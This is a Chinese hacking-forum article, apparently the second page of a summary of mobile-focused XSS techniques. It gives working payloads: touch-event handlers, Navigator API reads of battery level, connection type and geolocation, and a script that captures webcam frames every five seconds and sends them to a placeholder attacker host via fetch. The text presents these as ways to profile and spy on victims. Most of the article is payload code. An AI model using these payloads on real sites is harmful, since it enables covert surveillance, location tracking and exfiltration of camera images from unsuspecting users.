欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

新型XSS总结两则

来源:本站整理 作者:佚名 时间:2016-07-02 TAG: 我要投稿
html ontouchstart=alert(1)>
html ontouchend=alert(1)>
html ontouchmove=alert(1)>
html ontouchcancel=alert(1)>
除了事件之外,还可以通过Navigator API(应用程序接口)搞到特定设备的相关数据。除了最后介绍的振动数据之外,其他的同样适用于笔记本。例如,下面的数据,通过了解受害人使用哪种类型的互联网连接,对于攻击者发动更全面的攻击非常有帮助:

svg onload=alert(navigator.connection.type)>
下列代码(适用于Firefox)可以获取设备的电量数据:
svg onload=alert(navigator.battery.level)>
svg onload=alert(navigator.battery.dischargingTime)>
svg onload=alert(navigator.battery.charging)>
了解电池的剩余电量,在耗尽电池剩余电量来迫使某人离线时非常有用。借助于连接类型,就可以知道受害者使用的是WI-FI连接还是蜂窝网络。通过了解网速的变化,甚至可以推断出受害者的位置(如是否远离房间),这些信息对于进一步的攻击是很有用的。

如果能够获得被害者精确位置就更好了,为此,可以借助于地理定位属性:
navigator.geolocation.getCurrentPosition(function(p){
alert('Latitude:'+p.coords.latitude+',Longitude:'+
p.coords.longitude+',Altitude:'+p.coords.altitude);})
(remember to change “+” for “%2B” in URLs)
不过,上述代码需要受害者的相关授权。
如果我们有受害者的授权的话,甚至可以对相机进行截图,并发送到服务器(下列脚本适用于Chrome):
d=document;
v=d.createElement(‘video’);
c=d.createElement(‘canvas’);
c.width=640;
c.height=480;
navigator.webkitGetUserMedia({‘video’:true},function(s){
v.src=URL.createObjectURL(s);v.play()},function(){});
c2=c.getContext(‘2d’);
x=’c2.drawImage(v,0,0,640,480);fetch(“//HOST/”+c2.canvas.toDataURL())‘;
setInterval(x,5000);

受害者的截屏经编码后存放在服务器的日志中
若想利用自己的相机进行测试,只需要用下列代码替换掉上面的fetch(“//HOST/”+c2.canvas.toDataURL())‘;即可:

open(c2.canvas.toDataURL())
每隔5秒截屏一次。
对于手机来说,最激动人心的PoC非震动功能莫属:
如果你的手机启用了震动模式,可以点击链接来体验一把XSS演示(适用于Firefox浏览器)。
第一个示例中的数字是指振动的毫秒数。在第二个示例中,表示先震动500毫秒,间隔300毫秒,再震动100毫秒。
由于这是一个发展迅猛的领域,所以一些涉及手机的API会被淘汰,同时,对于移动设备的支持也会因浏览器的不同而有所差异。所以,了解它们的最佳方法就是参考类似Mozilla等浏览器的官方文档。
0x04 小结
本文中,我们总结了两种XSS技术,希望大家能够喜欢。
0x05 引用
https://c0nradsc0rner.wordpress.com/2016/06/17/xss-persistence-using-jsonp-and-serviceworkers/
http://brutelogic.com.br/blog/xss-in-mobile-devices/
 

上一页  [1] [2] 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载